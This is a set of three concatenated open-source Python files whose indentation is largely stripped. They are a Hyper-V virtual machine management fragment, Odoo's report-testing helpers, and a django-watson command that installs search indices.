procsetting.VirtualQuantity = vcpus
procsetting.Reservation = vcpus
procsetting.Limit = 100000 # static assignment to 100%
procsetting.LimitProcessorFeatures = limit_cpu_features
self._modify_virt_resource(procsetting, vm.path_())
def update_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
vm = self._lookup_vm_check(vm_name)
vmsetting = self._get_vm_setting_data(vm)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def check_admin_permissions(self):
if not self._conn.Msvm_VirtualSystemManagementService():
msg = _("The Windows account running nova-compute on this Hyper-V"
" host doesn't have the required permissions to create or"
" operate the virtual machine.")
raise HyperVAuthorizationException(msg)
def create_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
"""Creates a VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
LOG.debug(_('Creating VM %s'), vm_name)
vm = self._create_vm_obj(vs_man_svc, vm_name)
vmsetting = self._get_vm_setting_data(vm)
LOG.debug(_('Setting memory for vm %s'), vm_name)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
LOG.debug(_('Set vCPUs for vm %s'), vm_name)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def _create_vm_obj(self, vs_man_svc, vm_name):
vs_gs_data = self._conn.Msvm_VirtualSystemGlobalSettingData.new()
vs_gs_data.ElementName = vm_name
(job_path,
ret_val) = vs_man_svc.DefineVirtualSystem([], None,
vs_gs_data.GetText_(1))[1:]
self.check_ret_val(ret_val, job_path)
return self._lookup_vm_check(vm_name)
def get_vm_scsi_controller(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
res = [r for r in rasds
if r.ResourceSubType == self._SCSI_CTRL_RES_SUB_TYPE][0]
return res.path_()
def _get_vm_ide_controller(self, vm, ctrller_addr):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
return [r for r in rasds
if r.ResourceSubType == self._IDE_CTRL_RES_SUB_TYPE
and r.Address == str(ctrller_addr)][0].path_()
def get_vm_ide_controller(self, vm_name, ctrller_addr):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_ide_controller(vm, ctrller_addr)
def get_attached_disks_count(self, scsi_controller_path):
volumes = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"Parent = '%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type':
self._PHYS_DISK_RES_SUB_TYPE,
'parent':
scsi_controller_path.replace("'", "''")})
return len(volumes)
def _get_new_setting_data(self, class_name):
return self._conn.query("SELECT * FROM %s WHERE InstanceID "
"LIKE '%%\\Default'" % class_name)[0]
def _get_new_resource_setting_data(self, resource_sub_type,
class_name=None):
if class_name is None:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
return self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"InstanceID LIKE '%%\\Default'" %
{"class_name": class_name,
"res_sub_type": resource_sub_type})[0]
def attach_ide_drive(self, vm_name, path, ctrller_addr, drive_addr,
drive_type=constants.IDE_DISK):
"""Create an IDE drive and attach it to the vm."""
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_ide_controller(vm, ctrller_addr)
if drive_type == constants.IDE_DISK:
res_sub_type = self._DISK_RES_SUB_TYPE
elif drive_type == constants.IDE_DVD:
res_sub_type = self._DVD_RES_SUB_TYPE
drive = self._get_new_resource_setting_data(res_sub_type)
#Set the IDE ctrller as parent.
drive.Parent = ctrller_path
drive.Address = drive_addr
#Add the cloned disk drive object to the vm.
new_resources = self._add_virt_resource(drive, vm.path_())
drive_path = new_resources[0]
if drive_type == constants.IDE_DISK:
res_sub_type = self._IDE_DISK_RES_SUB_TYPE
elif drive_type == constants.IDE_DVD:
res_sub_type = self._IDE_DVD_RES_SUB_TYPE
res = self._get_new_resource_setting_data(res_sub_type)
#Set the new drive as the parent.
res.Parent = drive_path
res.Connection = [path]
#Add the new vhd object as a virtual hard disk to the vm.
self._add_virt_resource(res, vm.path_())
def create_scsi_controller(self, vm_name):
"""Create an iscsi controller ready to mount volumes."""
vm = self._lookup_vm_check(vm_name)
scsicontrl = self._get_new_resource_setting_data(
self._SCSI_CTRL_RES_SUB_TYPE)
scsicontrl.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
self._add_virt_resource(scsicontrl, vm.path_())
def attach_volume_to_controller(self, vm_name, controller_path, address,
mounted_disk_path):
"""Attach a volume to a controller."""
vm = self._lookup_vm_check(vm_name)
diskdrive = self._get_new_resource_setting_data(
self._PHYS_DISK_RES_SUB_TYPE)
diskdrive.Address = address
diskdrive.Parent = controller_path
diskdrive.HostResource = [mounted_disk_path]
self._add_virt_resource(diskdrive, vm.path_())
def set_nic_connection(self, vm_name, nic_name, vswitch_conn_data):
nic_data = self._get_nic_data_by_name(nic_name)
nic_data.Connection = [vswitch_conn_data]
vm = self._lookup_vm_check(vm_name)
self._modify_virt_resource(nic_data, vm.path_())
def _get_nic_data_by_name(self, name):
return self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=name)[0]
def create_nic(self, vm_name, nic_name, mac_address):
"""Create a (synthetic) nic and attach it to the vm."""
#Create a new nic
new_nic_data = self._get_new_setting_data(
self._SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS)
#Configure the nic
new_nic_data.ElementName = nic_name
new_nic_data.Address = mac_address.replace(':', '')
new_nic_data.StaticMacAddress = 'True'
new_nic_data.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
#Add the new nic to the vm
vm = self._lookup_vm_check(vm_name)
self._add_virt_resource(new_nic_data, vm.path_())
def set_vm_state(self, vm_name, req_state):
"""Set the desired state of the VM."""
vm = self._lookup_vm_check(vm_name)
(job_path,
ret_val) = vm.RequestStateChange(self._vm_power_states_map[req_state])
#Invalid state for current operation (32775) typically means that
#the VM is already in the state requested
self.check_ret_val(ret_val, job_path, [0, 32775])
LOG.debug(_("Successfully changed vm state of %(vm_name)s "
"to %(req_state)s"),
{'vm_name': vm_name, 'req_state': req_state})
def _get_disk_resource_disk_path(self, disk_resource):
return disk_resource.Connection
def get_vm_storage_paths(self, vm_name):
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
volume_drives = []
for volume_resource in volume_resources:
drive_path = volume_resource.HostResource[0]
volume_drives.append(drive_path)
disk_files = []
for disk_resource in disk_resources:
disk_files.extend(
[c for c in self._get_disk_resource_disk_path(disk_resource)])
return (disk_files, volume_drives)
def _get_vm_disks(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._STORAGE_ALLOC_SETTING_DATA_CLASS)
disk_resources = [r for r in rasds if
r.ResourceSubType in
[self._IDE_DISK_RES_SUB_TYPE,
self._IDE_DVD_RES_SUB_TYPE]]
volume_resources = [r for r in rasds if
r.ResourceSubType == self._PHYS_DISK_RES_SUB_TYPE]
return (disk_resources, volume_resources)
def destroy_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
#Remove the VM. Does not destroy disks.
(job_path, ret_val) = vs_man_svc.DestroyVirtualSystem(vm.path_())
self.check_ret_val(ret_val, job_path)
def check_ret_val(self, ret_val, job_path, success_values=[0]):
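        # (added note) Hyper-V WMI calls either complete synchronously, with
        # a return value in success_values, or start an asynchronous job
        # (WMI_JOB_STATUS_STARTED) that must be polled to completion.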
if ret_val == constants.WMI_JOB_STATUS_STARTED:
return self._wait_for_job(job_path)
elif ret_val not in success_values:
raise HyperVException(_('Operation failed with return value: %s')
% ret_val)
def _wait_for_job(self, job_path):
"""Poll WMI job state and wait for completion."""
job = self._get_wmi_obj(job_path)
while job.JobState == constants.WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = self._get_wmi_obj(job_path)
if job.JobState != constants.WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") %
{'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code})
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(error)s") %
{'job_state': job_state,
'error': error})
else:
raise HyperVException(_("WMI job failed with status "
"%d. No error "
"description available") %
job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug(_("WMI job succeeded: %(desc)s, Elapsed=%(elap)s"),
{'desc': desc, 'elap': elap})
return job
def _get_wmi_obj(self, path):
return wmi.WMI(moniker=path.replace('\\', '/'))
def _add_virt_resource(self, res_setting_data, vm_path):
"""Adds a new resource to the VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_xml = [res_setting_data.GetText_(1)]
(job_path,
new_resources,
ret_val) = vs_man_svc.AddVirtualSystemResources(res_xml, vm_path)
self.check_ret_val(ret_val, job_path)
return new_resources
def _modify_virt_resource(self, res_setting_data, vm_path):
"""Updates a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
ResourceSettingData=[res_setting_data.GetText_(1)],
ComputerSystem=vm_path)
self.check_ret_val(ret_val, job_path)
def _remove_virt_resource(self, res_setting_data, vm_path):
"""Removes a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_path = [res_setting_data.path_()]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemResources(res_path,
vm_path)
self.check_ret_val(ret_val, job_path)
def take_vm_snapshot(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val,
snp_setting_data) = vs_man_svc.CreateVirtualSystemSnapshot(vm.path_())
self.check_ret_val(ret_val, job_path)
job_wmi_path = job_path.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
snp_setting_data = job.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)[0]
return snp_setting_data.path_()
def remove_vm_snapshot(self, snapshot_path):
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemSnapshot(
snapshot_path)
self.check_ret_val(ret_val, job_path)
def detach_vm_disk(self, vm_name, disk_path):
vm = self._lookup_vm_check(vm_name)
physical_disk = self._get_mounted_disk_resource_from_path(disk_path)
if physical_disk:
self._remove_virt_resource(physical_disk, vm.path_())
def _get_mounted_disk_resource_from_path(self, disk_path):
physical_disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type':
self._PHYS_DISK_RES_SUB_TYPE})
for physical_disk in physical_disks:
if physical_disk.HostResource:
if physical_disk.HostResource[0].lower() == disk_path.lower():
return physical_disk
def get_mounted_disk_by_drive_number(self, device_number):
mounted_disks = self._conn.query("SELECT * FROM Msvm_DiskDrive "
"WHERE DriveNumber=" +
str(device_number))
if len(mounted_disks):
return mounted_disks[0].path_()
def get_controller_volume_paths(self, controller_path):
disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s' "
"AND Parent='%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._PHYS_DISK_RES_SUB_TYPE,
"parent":
controller_path})
disk_data = {}
for disk in disks:
if disk.HostResource:
disk_data[disk.path().RelPath] = disk.HostResource[0]
return disk_data
def enable_vm_metrics_collection(self, vm_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
|
Nowheresly/odoo | refs/heads/8.0 | openerp/tools/test_reports.py | 337 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Helper functions for reports testing.
Please /do not/ import this file by default; import it explicitly, and only
from the code of YAML tests.
"""
import openerp
import openerp.report
import openerp.tools as tools
import logging
from openerp.tools.safe_eval import safe_eval
from subprocess import Popen, PIPE
import os
import tempfile
_logger = logging.getLogger(__name__)
_test_logger = logging.getLogger('openerp.tests')
def try_report(cr, uid, rname, ids, data=None, context=None, our_module=None, report_type=None):
""" Try to render a report <rname> with contents of ids
This function should also check for common pitfalls of reports.
"""
if data is None:
data = {}
if context is None:
context = {}
if rname.startswith('report.'):
rname_s = rname[7:]
else:
rname_s = rname
_test_logger.info(" - Trying %s.create(%r)", rname, ids)
res = openerp.report.render_report(cr, uid, ids, rname_s, data, context)
if not isinstance(res, tuple):
raise RuntimeError("Result of %s.create() should be a (data,format) tuple, now it is a %s" % \
(rname, type(res)))
(res_data, res_format) = res
if not res_data:
raise ValueError("Report %s produced an empty result!" % rname)
if tools.config['test_report_directory']:
file(os.path.join(tools.config['test_report_directory'], rname+ '.'+res_format), 'wb+').write(res_data)
_logger.debug("Have a %s report for %s, will examine it", res_format, rname)
if res_format == 'pdf':
if res_data[:5] != '%PDF-':
raise ValueError("Report %s produced a non-pdf header, %r" % (rname, res_data[:10]))
res_text = False
try:
fd, rfname = tempfile.mkstemp(suffix=res_format)
os.write(fd, res_data)
os.close(fd)
proc = Popen(['pdftotext', '-enc', 'UTF-8', '-nopgbrk', rfname, '-'], shell=False, stdout=PIPE)
stdout, stderr = proc.communicate()
res_text = tools.ustr(stdout)
os.unlink(rfname)
except Exception:
_logger.debug("Unable to parse PDF report: install pdftotext to perform automated tests.")
if res_text is not False:
for line in res_text.split('\n'):
if ('[[' in line) or ('[ [' in line):
_logger.error("Report %s may have bad expression near: \"%s\".", rname, line[80:])
# TODO more checks, what else can be a sign of a faulty report?
elif res_format == 'html':
pass
else:
_logger.warning("Report %s produced a \"%s\" chunk, cannot examine it", rname, res_format)
return False
_test_logger.info(" + Report %s produced correctly.", rname)
return True
def try_report_action(cr, uid, action_id, active_model=None, active_ids=None,
wiz_data=None, wiz_buttons=None,
context=None, our_module=None):
"""Take an ir.action.act_window and follow it until a report is produced
:param action_id: the integer id of an action, or a reference to xml id
of the act_window (can search [our_module.]+xml_id
:param active_model, active_ids: call the action as if it had been launched
from that model+ids (tree/form view action)
:param wiz_data: a dictionary of values to use in the wizard, if needed.
They will override (or complete) the default values of the
wizard form.
:param wiz_buttons: a list of button names, or button icon strings, which
should be preferred to press during the wizard.
Eg. 'OK' or 'gtk-print'
:param our_module: the name of the calling module (string), like 'account'
"""
if not our_module and isinstance(action_id, basestring):
if '.' in action_id:
our_module = action_id.split('.', 1)[0]
if context is None:
context = {}
else:
context = context.copy() # keep it local
# TODO context fill-up
registry = openerp.registry(cr.dbname)
def log_test(msg, *args):
_test_logger.info(" - " + msg, *args)
datas = {}
if active_model:
datas['model'] = active_model
if active_ids:
datas['ids'] = active_ids
if not wiz_buttons:
wiz_buttons = []
if isinstance(action_id, basestring):
if '.' in action_id:
act_module, act_xmlid = action_id.split('.', 1)
else:
if not our_module:
                raise ValueError('You cannot specify action_id "%s" without a module name' % action_id)
act_module = our_module
act_xmlid = action_id
act_model, act_id = registry['ir.model.data'].get_object_reference(cr, uid, act_module, act_xmlid)
else:
assert isinstance(action_id, (long, int))
act_model = 'ir.action.act_window' # assume that
act_id = action_id
act_xmlid = '<%s>' % act_id
def _exec_action(action, datas, context):
# taken from client/modules/action/main.py:84 _exec_action()
if isinstance(action, bool) or 'type' not in action:
return
# Updating the context : Adding the context of action in order to use it on Views called from buttons
if datas.get('id',False):
context.update( {'active_id': datas.get('id',False), 'active_ids': datas.get('ids',[]), 'active_model': datas.get('model',False)})
context1 = action.get('context', {})
if isinstance(context1, basestring):
context1 = safe_eval(context1, context.copy())
context.update(context1)
if action['type'] in ['ir.actions.act_window', 'ir.actions.submenu']:
for key in ('res_id', 'res_model', 'view_type', 'view_mode',
'limit', 'auto_refresh', 'search_view', 'auto_search', 'search_view_id'):
datas[key] = action.get(key, datas.get(key, None))
view_id = False
if action.get('views', []):
if isinstance(action['views'],list):
view_id = action['views'][0][0]
datas['view_mode']= action['views'][0][1]
else:
if action.get('view_id', False):
view_id = action['view_id'][0]
elif action.get('view_id', False):
view_id = action['view_id'][0]
assert datas['res_model'], "Cannot use the view without a model"
# Here, we have a view that we need to emulate
log_test("will emulate a %s view: %s#%s",
action['view_type'], datas['res_model'], view_id or '?')
view_res = registry[datas['res_model']].fields_view_get(cr, uid, view_id, action['view_type'], context)
assert view_res and view_res.get('arch'), "Did not return any arch for the view"
view_data = {}
if view_res.get('fields',{}).keys():
view_data = registry[datas['res_model']].default_get(cr, uid, view_res['fields'].keys(), context)
if datas.get('form'):
view_data.update(datas.get('form'))
if wiz_data:
view_data.update(wiz_data)
_logger.debug("View data is: %r", view_data)
for fk, field in view_res.get('fields',{}).items():
# Default fields returns list of int, while at create()
# we need to send a [(6,0,[int,..])]
if field['type'] in ('one2many', 'many2many') \
and view_data.get(fk, False) \
and isinstance(view_data[fk], list) \
and not isinstance(view_data[fk][0], tuple) :
view_data[fk] = [(6, 0, view_data[fk])]
action_name = action.get('name')
try:
from xml.dom import minidom
cancel_found = False
buttons = []
dom_doc = minidom.parseString(view_res['arch'])
if not action_name:
action_name = dom_doc.documentElement.getAttribute('name')
for button in dom_doc.getElementsByTagName('button'):
button_weight = 0
if button.getAttribute('special') == 'cancel':
cancel_found = True
continue
if button.getAttribute('icon') == 'gtk-cancel':
cancel_found = True
continue
if button.getAttribute('default_focus') == '1':
button_weight += 20
if button.getAttribute('string') in wiz_buttons:
button_weight += 30
elif button.getAttribute('icon') in wiz_buttons:
button_weight += 10
string = button.getAttribute('string') or '?%s' % len(buttons)
buttons.append( { 'name': button.getAttribute('name'),
'string': string,
'type': button.getAttribute('type'),
'weight': button_weight,
})
except Exception, e:
_logger.warning("Cannot resolve the view arch and locate the buttons!", exc_info=True)
raise AssertionError(e.args[0])
if not datas['res_id']:
# it is probably an orm_memory object, we need to create
# an instance
datas['res_id'] = registry[datas['res_model']].create(cr, uid, view_data, context)
if not buttons:
raise AssertionError("view form doesn't have any buttons to press!")
buttons.sort(key=lambda b: b['weight'])
_logger.debug('Buttons are: %s', ', '.join([ '%s: %d' % (b['string'], b['weight']) for b in buttons]))
res = None
while buttons and not res:
b = buttons.pop()
log_test("in the \"%s\" form, I will press the \"%s\" button.", action_name, b['string'])
if not b['type']:
log_test("the \"%s\" button has no type, cannot use it", b['string'])
continue
if b['type'] == 'object':
#there we are! press the button!
fn = getattr(registry[datas['res_model']], b['name'])
if not fn:
_logger.error("The %s model doesn't have a %s attribute!", datas['res_model'], b['name'])
continue
res = fn(cr, uid, [datas['res_id'],], context)
break
else:
_logger.warning("in the \"%s\" form, the \"%s\" button has unknown type %s",
action_name, b['string'], b['type'])
return res
elif action['type']=='ir.actions.report.xml':
if 'window' in datas:
del datas['window']
if not datas:
datas = action.get('datas')
if not datas:
datas = action.get('data')
datas = datas.copy()
ids = datas.get('ids')
if 'ids' in datas:
del datas['ids']
res = try_report(cr, uid, 'report.'+action['report_name'], ids, datas, context, our_module=our_module)
return res
else:
raise Exception("Cannot handle action of type %s" % act_model)
log_test("will be using %s action %s #%d", act_model, act_xmlid, act_id)
action = registry[act_model].read(cr, uid, [act_id], context=context)[0]
assert action, "Could not read action %s[%s]" %(act_model, act_id)
loop = 0
while action:
loop += 1
# This part tries to emulate the loop of the Gtk client
if loop > 100:
_logger.error("Passed %d loops, giving up", loop)
raise Exception("Too many loops at action")
log_test("it is an %s action at loop #%d", action.get('type', 'unknown'), loop)
result = _exec_action(action, datas, context)
if not isinstance(result, dict):
break
datas = result.get('datas', {})
if datas:
del result['datas']
action = result
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
samuelcolvin/django-watson | refs/heads/master | src/watson/management/commands/installwatson.py | 5 | """Creates the database indices needed by django-watson."""
from __future__ import unicode_literals
from django.core.management.base import NoArgsCommand
from watson.registration import get_backend
class Command(NoArgsCommand):
help = "Creates the database indices needed by django-watson."
def handle_noargs(self, **options):
"""Runs the management command."""
verbosity = int(options.get("verbosity", 1))
backend = get_backend()
if not backend.requires_installation:
if verbosity >= 2:
self.stdout.write("Your search backend does not require installation.\n")
elif backend.is_installed():
if verbosity >= 2:
self.stdout.write("django-watson is already installed.\n")
else:
backend.do_install()
if verbosity >= 2:
self.stdout.write("django-watson has been successfully installed.\n")
|